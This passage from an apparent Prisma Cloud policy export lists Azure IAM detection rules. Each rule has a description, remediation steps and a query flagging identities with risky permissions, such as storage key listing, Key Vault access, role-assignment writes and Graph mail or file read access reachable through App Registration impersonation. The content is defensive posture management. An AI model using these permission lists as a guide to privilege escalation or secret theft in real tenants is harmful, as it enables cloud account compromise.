        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V3069" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="W3069" t="inlineStr">
        <is>
          <t>This policy identifies Azure virtual machines or serverless services with a managed identity attached that can impersonate an App Registration using the 'Create Credentials' or 'Change Ownership' features. These App Registrations, accessed via the managed identity, are granted Graph API permissions allowing read access to Microsoft 365 files or Outlook mail.</t>
        </is>
      </c>
      <c r="X3069" t="inlineStr">
        <is>
          <t>How to remediate?
Click on the Source.
On the right, click on View JSON.
From the JSON, extract all the principalId under the "identity" property.
If more than one principalId exists, repeat the following steps (5-13) for each system-assigned and user-assigned principalId.
Log in to the Azure Portal.
Navigate to Enterprise Applications, and find the matching Enterprise Application by pasting the principalId from the previous step.
Click on the Enterprise Application.
Go to Manage.
Go to Roles and administrators.
Revoke the relevant role that grants the "microsoft.directory/applications/credentials/update" or "microsoft.directory/applications/owners/update" action.
Go to Security.
Go to Permissions.
Revoke the Graph API permission that grants "Application.ReadWrite.All" or "Directory.ReadWrite.All".</t>
        </is>
      </c>
      <c r="Y306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69" t="inlineStr">
        <is>
          <t>config from iam where source.cloud.type = 'AZURE' AND source.cloud.resource.type in ('virtualMachines','sites','virtualMachineScaleSets/virtualMachines')  and grantedby.cloud.entity.type = 'App Registration'  and grantedby.cloud.policy.type = 'Microsoft Graph' and action.name in ('Files.Read.All', 'Files.ReadWrite.All','Sites.Read.All','Sites.ReadWrite.All','Sites.FullControl.All','Sites.Selected','Mail.ReadWrite','Mail.Read')</t>
        </is>
      </c>
      <c r="AA3069" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB3069" t="inlineStr">
        <is>
          <t>2024-11-11 03:56:36</t>
        </is>
      </c>
      <c r="AC3069" t="inlineStr"/>
      <c r="AD3069" t="b">
        <v>1</v>
      </c>
      <c r="AE3069" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF3069" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG30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69" t="inlineStr">
        <is>
          <t>6273d57a-19f1-49c4-b81e-7f9fd36dae6d</t>
        </is>
      </c>
      <c r="AI3069" t="inlineStr">
        <is>
          <t>6273d57a-19f1-49c4-b81e-7f9fd36dae6d</t>
        </is>
      </c>
      <c r="AJ3069" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK3069" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="3070">
      <c r="A3070" t="inlineStr"/>
      <c r="B3070" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C3070" s="2" t="inlineStr"/>
      <c r="D3070" t="inlineStr"/>
      <c r="E3070" t="inlineStr"/>
      <c r="F3070" t="inlineStr"/>
      <c r="G3070" t="b">
        <v>1</v>
      </c>
      <c r="H30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0" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J3070" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="K3070" t="inlineStr">
        <is>
          <t>Azure entities with risky permissions</t>
        </is>
      </c>
      <c r="L3070" t="inlineStr">
        <is>
          <t>HIGH_PRIVILEGED_ROLE</t>
        </is>
      </c>
      <c r="M3070" t="inlineStr">
        <is>
          <t>informational</t>
        </is>
      </c>
      <c r="N3070" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O3070" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="P3070" t="inlineStr">
        <is>
          <t>permissions</t>
        </is>
      </c>
      <c r="Q3070" t="inlineStr"/>
      <c r="R3070" t="inlineStr"/>
      <c r="S3070" t="inlineStr">
        <is>
          <t>Attack Path Rule</t>
        </is>
      </c>
      <c r="T3070" t="b">
        <v>1</v>
      </c>
      <c r="U3070" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V3070" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="W3070" t="inlineStr">
        <is>
          <t>This policy identifies Azure IAM permissions that are risky. Ensure that the Azure entities provisioned in your Azure subscription don’t have a risky set of permissions to minimize security risks.</t>
        </is>
      </c>
      <c r="X3070"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risky permissions
6. Remove the assignment
7. Create a new assignment with built-in or custom role without risky permissions, if necessary</t>
        </is>
      </c>
      <c r="Y307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0" t="inlineStr">
        <is>
          <t>config from iam where dest.cloud.type = 'AZURE' and action.name in ('Microsoft.AzureActiveDirectory/b2cDirectories/write','Microsoft.ManagedIdentity/userAssignedIdentities/write','Microsoft.ManagedIdentity/userAssignedIdentities/assign/action','Microsoft.KeyVault/vaults/read','Microsoft.KeyVault/vaults/write','Microsoft.KeyVault/vaults/deploy/action','Microsoft.KeyVault/vaults/accessPolicies/write','Microsoft.Authorization/roleDefinitions/write','Microsoft.Authorization/roleAssignments/write','Microsoft.Authorization/policySetDefinitions/write','Microsoft.Authorization/policyExemptions/write','Microsoft.Authorization/policyDefinitions/write','Microsoft.Authorization/policyAssignments/resourceManagementPrivateLinks/privateEndpointConnections/write','Microsoft.Authorization/policyAssignments/resourceManagementPrivateLinks/privateEndpointConnectionProxies/write','Microsoft.Authorization/policyAssignments/resourceManagementPrivateLinks/write','Microsoft.Authorization/policyAssignments/privateLinkAssociations/write','Microsoft.Authorization/policyAssignments/write','Microsoft.Authorization/locks/write','Microsoft.Authorization/denyAssignments/write','Microsoft.Authorization/classicAdministrators/write')</t>
        </is>
      </c>
      <c r="AA3070" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB3070" t="inlineStr">
        <is>
          <t>2024-10-30 16:43:02</t>
        </is>
      </c>
      <c r="AC3070" t="inlineStr"/>
      <c r="AD3070" t="b">
        <v>1</v>
      </c>
      <c r="AE3070" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF3070" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG30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0" t="inlineStr">
        <is>
          <t>85be5422-99bb-4e33-aefa-633885dc737d</t>
        </is>
      </c>
      <c r="AI3070" t="inlineStr">
        <is>
          <t>85be5422-99bb-4e33-aefa-633885dc737d</t>
        </is>
      </c>
      <c r="AJ3070" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK3070" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="3071">
      <c r="A3071" t="inlineStr"/>
      <c r="B3071" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C3071" s="2" t="inlineStr"/>
      <c r="D3071" t="inlineStr"/>
      <c r="E3071" t="inlineStr"/>
      <c r="F3071" t="inlineStr"/>
      <c r="G3071" t="b">
        <v>1</v>
      </c>
      <c r="H30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1" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J3071" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="K3071" t="inlineStr">
        <is>
          <t>Azure AD Groups, Service Principals and Managed Identities with IAM Data Write permissions are unused for 90 days</t>
        </is>
      </c>
      <c r="L3071" t="inlineStr">
        <is>
          <t>PRIVILEGE_ESCALATION</t>
        </is>
      </c>
      <c r="M3071" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N3071" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O3071" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="P3071" t="inlineStr">
        <is>
          <t>permissions</t>
        </is>
      </c>
      <c r="Q3071" t="inlineStr"/>
      <c r="R3071" t="inlineStr"/>
      <c r="S3071" t="inlineStr">
        <is>
          <t>Prisma_Cloud</t>
        </is>
      </c>
      <c r="T3071" t="b">
        <v>0</v>
      </c>
      <c r="U3071" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V3071" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="W3071" t="inlineStr">
        <is>
          <t>This policy identifies Azure AD Groups, Service Principals, and Managed Identities with Stale Azure RBAC Data Write Permissions.
Risk of Unused Data Write Permissions:
Unused Azure AD groups, service principals, and managed identities with Azure RBAC Data Write permissions for 90 days pose a significant security threat because:
Unsecured Access Point: These identities act like forgotten open doors with high-level access. If compromised, attackers can directly modify or delete sensitive data stored in Azure Blob storage, Azure SQL databases, or other Azure services. This could lead to severe disruption, data breaches, or financial losses.
Elevated Attack Potential: Data Write permissions grant attackers the ability to manipulate core information. They could tamper with databases, alter financial records, or corrupt other critical data, leading to significant consequences.
Mitigating the Risk:
Regular Review and Removal: Proactively identify and remove unused Azure AD groups, service principals, and managed identities with any level of Azure RBAC Data Write permissions (Read or Write) on a regular basis.
Principle of Least Privilege: Always adhere to the principle of least privilege when assigning Azure RBAC permissions. Grant only the minimum level of Data Write access required for an identity to function effectively. Evaluate if alternative methods, like Azure Active Directory Conditional Access or Azure Key Vault access policies, can restrict access to specific data sets or services.
Monitor for Data Anomalies: Implement Azure Monitor and Azure Sentinel to monitor data access attempts and changes within your Azure services. This vigilance can help detect unusual activity related to unused identities that might indicate a compromise and data tampering.</t>
        </is>
      </c>
      <c r="X3071"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71" t="inlineStr"/>
      <c r="Z3071" t="inlineStr">
        <is>
          <t>config from iam where source.cloud.type = 'Azure' and grantedby.cloud.entity.type NOT IN ('user') and action.access.level = 'Data Write' and action.lastaccess.days &gt; 90</t>
        </is>
      </c>
      <c r="AA3071" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB3071" t="inlineStr">
        <is>
          <t>2024-09-27 06:26:54</t>
        </is>
      </c>
      <c r="AC3071" t="inlineStr"/>
      <c r="AD3071" t="b">
        <v>1</v>
      </c>
      <c r="AE3071" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF3071" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG30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1" t="inlineStr">
        <is>
          <t>262fc907-f281-4bf5-9d63-d29a279a2233</t>
        </is>
      </c>
      <c r="AI3071" t="inlineStr">
        <is>
          <t>262fc907-f281-4bf5-9d63-d29a279a2233</t>
        </is>
      </c>
      <c r="AJ3071" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK3071" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="3072">
      <c r="A3072" t="inlineStr"/>
      <c r="B3072" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C3072" s="2" t="inlineStr"/>
      <c r="D3072" t="inlineStr"/>
      <c r="E3072" t="inlineStr"/>
      <c r="F3072" t="inlineStr"/>
      <c r="G3072" t="b">
        <v>1</v>
      </c>
      <c r="H30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2" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J3072" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="K3072" t="inlineStr">
        <is>
          <t>Azure Administrators with IAM permissions are unused for 90 days</t>
        </is>
      </c>
      <c r="L3072" t="inlineStr">
        <is>
          <t>PRIVILEGE_ESCALATION</t>
        </is>
      </c>
      <c r="M3072" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N3072" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O3072" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="P3072" t="inlineStr">
        <is>
          <t>permissions</t>
        </is>
      </c>
      <c r="Q3072" t="inlineStr"/>
      <c r="R3072" t="inlineStr"/>
      <c r="S3072" t="inlineStr">
        <is>
          <t>Prisma_Cloud</t>
        </is>
      </c>
      <c r="T3072" t="b">
        <v>1</v>
      </c>
      <c r="U3072" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V3072" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="W3072" t="inlineStr">
        <is>
          <t>This policy identifies Azure Administrators with Stale Azure RBAC Permissions (Unused for 90 days).
Risk of Unused Azure RBAC Permissions:
Azure Admins with any level of Azure RBAC permissions (administrative or otherwise) that haven't been used for 90 days pose a security risk because:
Unsecured Access Point: These accounts act like forgotten open doors. If compromised, attackers can exploit them to gain access to Azure resources and perform unauthorized actions, potentially leading to data breaches or disrupting critical services.
Elevated Attack Potential: Azure RBAC permissions can vary widely, with some granting high-level access to manage subscriptions, virtual machines, or modify security configurations. If compromised, an unused account with such permissions could be devastating.
Mitigating the Risk:
Regular Review and Removal: Proactively identify and remove unused Azure AD users on a regular basis (ideally less than 90 days). Focus on users with any level of Azure RBAC permissions, not just administrative privileges.
Principle of Least Privilege: When creating Azure AD users, assign only the minimum RBAC permissions required for them to perform their specific tasks. Regularly review and adjust permissions as needed.
Multi-Factor Authentication (MFA): Enforce MFA for all Azure AD users to add an extra layer of security and make it significantly harder for attackers to compromise an account, even if they obtain the credentials.
Azure AD Privileged Access Management (PAM): Implement Azure AD PAM to restrict access to highly privileged accounts and activities. This can further mitigate the risk associated with unused privileged accounts.
Monitor for Suspicious Activity: Utilize Azure Monitor to track activity logs, including access attempts for Azure AD users. This vigilance can help detect unusual activity related to unused accounts that might indicate a compromise.</t>
        </is>
      </c>
      <c r="X3072"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07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2" t="inlineStr">
        <is>
          <t>config from iam where source.cloud.type = 'Azure' and action.access.isadministrative = true and action.lastaccess.days &gt; 90</t>
        </is>
      </c>
      <c r="AA3072" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB3072" t="inlineStr">
        <is>
          <t>2024-09-27 06:26:54</t>
        </is>
      </c>
      <c r="AC3072" t="inlineStr"/>
      <c r="AD3072" t="b">
        <v>1</v>
      </c>
      <c r="AE3072" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF3072" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG30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2" t="inlineStr">
        <is>
          <t>eeaafcc6-0994-461f-a48e-71f91cc0f1ac</t>
        </is>
      </c>
      <c r="AI3072" t="inlineStr">
        <is>
          <t>eeaafcc6-0994-461f-a48e-71f91cc0f1ac</t>
        </is>
      </c>
      <c r="AJ3072" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK3072" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="3073">
      <c r="A3073" t="inlineStr"/>
      <c r="B3073" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C3073" s="2" t="inlineStr"/>
      <c r="D3073" t="inlineStr"/>
      <c r="E3073" t="inlineStr"/>
      <c r="F3073" t="inlineStr"/>
      <c r="G3073" t="b">
        <v>1</v>
      </c>
      <c r="H30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3" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J3073" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="K3073" t="inlineStr">
        <is>
          <t>Azure Managed Identity with permissions to manage Azure permissions broadly that was unused in the last 90 days</t>
        </is>
      </c>
      <c r="L3073" t="inlineStr">
        <is>
          <t>UNUSED_PRIVILEGES</t>
        </is>
      </c>
      <c r="M3073" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N3073" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O3073" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="P3073" t="inlineStr">
        <is>
          <t>permissions</t>
        </is>
      </c>
      <c r="Q3073" t="inlineStr"/>
      <c r="R3073" t="inlineStr"/>
      <c r="S3073" t="inlineStr"/>
      <c r="T3073" t="b">
        <v>1</v>
      </c>
      <c r="U3073" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V3073" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="W3073" t="inlineStr">
        <is>
          <t>Managed identities provide an automatic way for applications to connect to resources that support Azure Active Directory (Azure AD) authentication. Managed identity with the ability to change Azure permissions through role assignments are risky permission that can lead to privilege escalation</t>
        </is>
      </c>
      <c r="X3073"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and the role with over-privileged permissions
6. Remove the assignment
7. Create a new assignment with built-in or custom role without risky permissions, if necessary</t>
        </is>
      </c>
      <c r="Y307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3" t="inlineStr">
        <is>
          <t>config from iam where source.cloud.type = 'Azure' AND grantedby.cloud.entity.type IN ( 'System Assigned', 'User Assigned' ) AND dest.cloud.resource.name = '*' AND action.name STARTS WITH 'Microsoft.Authorization/roleAssignments/' AND action.lastaccess.days &gt; 90</t>
        </is>
      </c>
      <c r="AA3073" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB3073" t="inlineStr">
        <is>
          <t>2024-11-11 03:56:37</t>
        </is>
      </c>
      <c r="AC3073" t="inlineStr"/>
      <c r="AD3073" t="b">
        <v>1</v>
      </c>
      <c r="AE3073" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF3073" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG30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3" t="inlineStr">
        <is>
          <t>1df9a6a1-1f9a-4dbe-a170-19d45ffa95a6</t>
        </is>
      </c>
      <c r="AI3073" t="inlineStr">
        <is>
          <t>1df9a6a1-1f9a-4dbe-a170-19d45ffa95a6</t>
        </is>
      </c>
      <c r="AJ3073" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK3073" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="3074">
      <c r="A3074" t="inlineStr"/>
      <c r="B3074" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C3074" s="2" t="inlineStr"/>
      <c r="D3074" t="inlineStr"/>
      <c r="E3074" t="inlineStr"/>
      <c r="F3074" t="inlineStr"/>
      <c r="G3074" t="b">
        <v>1</v>
      </c>
      <c r="H30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4" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J3074" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="K3074" t="inlineStr">
        <is>
          <t>Azure VM instance with risky Storage account permissions</t>
        </is>
      </c>
      <c r="L3074" t="inlineStr">
        <is>
          <t>PRIVILEGE_ESCALATION</t>
        </is>
      </c>
      <c r="M3074" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N3074" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O3074" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="P3074" t="inlineStr">
        <is>
          <t>permissions</t>
        </is>
      </c>
      <c r="Q3074" t="inlineStr"/>
      <c r="R3074" t="inlineStr"/>
      <c r="S3074" t="inlineStr">
        <is>
          <t>Attack Path Rule</t>
        </is>
      </c>
      <c r="T3074" t="b">
        <v>1</v>
      </c>
      <c r="U3074" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V3074" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="W3074" t="inlineStr">
        <is>
          <t>With access to following risky permissions 'Microsoft.Storage/storageAccounts/write', 'Microsoft.Storage/storageAccounts/listKeys/action', 'Microsoft.Storage/storageAccounts/regeneratekey/action', 'Microsoft.Storage/storageAccounts/delete', 'Microsoft.Storage/storageAccounts/ListAccountSas/action' an adversary can destroy sensitive information stored in your cloud resources, making irreversible damage to your organization</t>
        </is>
      </c>
      <c r="X3074" t="inlineStr">
        <is>
          <t>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307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4" t="inlineStr">
        <is>
          <t>config from iam where dest.cloud.type = 'AZURE' and source.cloud.service.name = 'Microsoft.Compute' and action.name IN ('Microsoft.Storage/storageAccounts/write', 'Microsoft.Storage/storageAccounts/listKeys/action', 'Microsoft.Storage/storageAccounts/regeneratekey/action', 'Microsoft.Storage/storageAccounts/delete' , 'Microsoft.Storage/storageAccounts/ListAccountSas/action')</t>
        </is>
      </c>
      <c r="AA3074" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB3074" t="inlineStr">
        <is>
          <t>2024-11-11 03:56:37</t>
        </is>
      </c>
      <c r="AC3074" t="inlineStr"/>
      <c r="AD3074" t="b">
        <v>1</v>
      </c>
      <c r="AE3074" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF3074" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG30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4" t="inlineStr">
        <is>
          <t>b6d5cdbd-1fa5-45f3-a6a4-f5a053acf5e1</t>
        </is>
      </c>
      <c r="AI3074" t="inlineStr">
        <is>
          <t>b6d5cdbd-1fa5-45f3-a6a4-f5a053acf5e1</t>
        </is>
      </c>
      <c r="AJ3074" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK3074" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="3075">
      <c r="A3075" t="inlineStr"/>
      <c r="B3075" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C3075" s="2" t="inlineStr"/>
      <c r="D3075" t="inlineStr"/>
      <c r="E3075" t="inlineStr"/>
      <c r="F3075" t="inlineStr"/>
      <c r="G3075" t="b">
        <v>1</v>
      </c>
      <c r="H30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5" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J3075" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="K3075" t="inlineStr">
        <is>
          <t>Azure AD Groups, Service Principals and Managed Identities with Excessive Policies</t>
        </is>
      </c>
      <c r="L3075" t="inlineStr">
        <is>
          <t>PRIVILEGE_ESCALATION</t>
        </is>
      </c>
      <c r="M3075" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N3075" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O3075" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="P3075" t="inlineStr">
        <is>
          <t>permissions</t>
        </is>
      </c>
      <c r="Q3075" t="inlineStr"/>
      <c r="R3075" t="inlineStr"/>
      <c r="S3075" t="inlineStr">
        <is>
          <t>Prisma_Cloud</t>
        </is>
      </c>
      <c r="T3075" t="b">
        <v>0</v>
      </c>
      <c r="U3075" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V3075" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="W3075" t="inlineStr">
        <is>
          <t>This policy identifies Azure roles that contain '*' in Action, and the level of role assignment is Subscription or higher.
Roles with '*' in the Action section for a subscription or higher scope (like management group) allow users to perform any action on any resource within that scope. This is risky because:
- Unrestricted Access: Users can bypass security measures and potentially delete critical resources or modify configurations.
- Accidental Damage: Mistakes can have a significant impact, deleting entire resources or services.
- Elevated Attack Surface: A compromised account with such a role gives attackers vast control.</t>
        </is>
      </c>
      <c r="X3075"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75" t="inlineStr"/>
      <c r="Z3075" t="inlineStr">
        <is>
          <t>config from iam where source.cloud.type = 'Azure' and grantedby.level.type IN ( 'Azure Management Group' , 'Azure Subscription' ) and grantedby.cloud.entity.type NOT IN ('user') and grantedby.cloud.policy.isexcessive = true</t>
        </is>
      </c>
      <c r="AA3075" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB3075" t="inlineStr">
        <is>
          <t>2024-09-27 06:26:54</t>
        </is>
      </c>
      <c r="AC3075" t="inlineStr"/>
      <c r="AD3075" t="b">
        <v>1</v>
      </c>
      <c r="AE3075" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF3075" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG30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5" t="inlineStr">
        <is>
          <t>6f499784-70a6-4a7e-a27f-e10e4d6bc25f</t>
        </is>
      </c>
      <c r="AI3075" t="inlineStr">
        <is>
          <t>6f499784-70a6-4a7e-a27f-e10e4d6bc25f</t>
        </is>
      </c>
      <c r="AJ3075" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK3075" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="3076">
      <c r="A3076" t="inlineStr"/>
      <c r="B3076" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C3076" s="2" t="inlineStr"/>
      <c r="D3076" t="inlineStr"/>
      <c r="E3076" t="inlineStr"/>
      <c r="F3076" t="inlineStr"/>
      <c r="G3076" t="b">
        <v>1</v>
      </c>
      <c r="H30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6" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J3076" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="K3076" t="inlineStr">
        <is>
          <t>Azure VM associated with entities that have risky permissions</t>
        </is>
      </c>
      <c r="L3076" t="inlineStr">
        <is>
          <t>PRIVILEGE_ESCALATION</t>
        </is>
      </c>
      <c r="M3076" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N3076" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O3076" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="P3076" t="inlineStr">
        <is>
          <t>permissions</t>
        </is>
      </c>
      <c r="Q3076" t="inlineStr"/>
      <c r="R3076" t="inlineStr"/>
      <c r="S3076" t="inlineStr">
        <is>
          <t>Attack Path Rule</t>
        </is>
      </c>
      <c r="T3076" t="b">
        <v>1</v>
      </c>
      <c r="U3076" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V3076" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="W3076" t="inlineStr">
        <is>
          <t>With access to the risky permissions in the policy an adversary can elevate the access of the VM instance, expanding the surface of the attack and granting access to cloud resources with sensitive information.</t>
        </is>
      </c>
      <c r="X3076" t="inlineStr">
        <is>
          <t>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307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6" t="inlineStr">
        <is>
          <t>config from iam where dest.cloud.type = 'AZURE' and action.name in ('Microsoft.AzureActiveDirectory/b2cDirectories/write','Microsoft.ManagedIdentity/userAssignedIdentities/write','Microsoft.ManagedIdentity/userAssignedIdentities/assign/action','Microsoft.KeyVault/vaults/read','Microsoft.KeyVault/vaults/write','Microsoft.KeyVault/vaults/deploy/action','Microsoft.KeyVault/vaults/accessPolicies/write','Microsoft.Authorization/roleDefinitions/write','Microsoft.Authorization/roleAssignments/write','Microsoft.Authorization/policySetDefinitions/write','Microsoft.Authorization/policyExemptions/write','Microsoft.Authorization/policyDefinitions/write','Microsoft.Authorization/policyAssignments/resourceManagementPrivateLinks/privateEndpointConnections/write','Microsoft.Authorization/policyAssignments/resourceManagementPrivateLinks/privateEndpointConnectionProxies/write','Microsoft.Authorization/policyAssignments/resourceManagementPrivateLinks/write','Microsoft.Authorization/policyAssignments/privateLinkAssociations/write','Microsoft.Authorization/policyAssignments/write','Microsoft.Authorization/locks/write','Microsoft.Authorization/denyAssignments/write','Microsoft.Authorization/classicAdministrators/write') AND source.cloud.service.name = 'Microsoft.Compute'</t>
        </is>
      </c>
      <c r="AA3076" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB3076" t="inlineStr">
        <is>
          <t>2024-11-11 03:56:37</t>
        </is>
      </c>
      <c r="AC3076" t="inlineStr"/>
      <c r="AD3076" t="b">
        <v>1</v>
      </c>
      <c r="AE3076" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF3076" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG30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6" t="inlineStr">
        <is>
          <t>1b4e2641-4315-4f41-a6da-e11ed8cd6990</t>
        </is>
      </c>
      <c r="AI3076" t="inlineStr">
        <is>
          <t>1b4e2641-4315-4f41-a6da-e11ed8cd6990</t>
        </is>
      </c>
      <c r="AJ3076" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK3076" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="3077">
      <c r="A3077" t="inlineStr"/>
      <c r="B3077" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C3077" s="2" t="inlineStr"/>
      <c r="D3077" t="inlineStr"/>
      <c r="E3077" t="inlineStr"/>
      <c r="F3077" t="inlineStr"/>
      <c r="G3077" t="b">
        <v>1</v>
      </c>
      <c r="H30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7" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J3077" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="K3077" t="inlineStr">
        <is>
          <t>Azure AD Groups, Service Principals and Managed Identities with IAM Metadata Write permissions are unused for 90 days</t>
        </is>
      </c>
      <c r="L3077" t="inlineStr">
        <is>
          <t>PRIVILEGE_ESCALATION</t>
        </is>
      </c>
      <c r="M3077" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N3077" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O3077" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
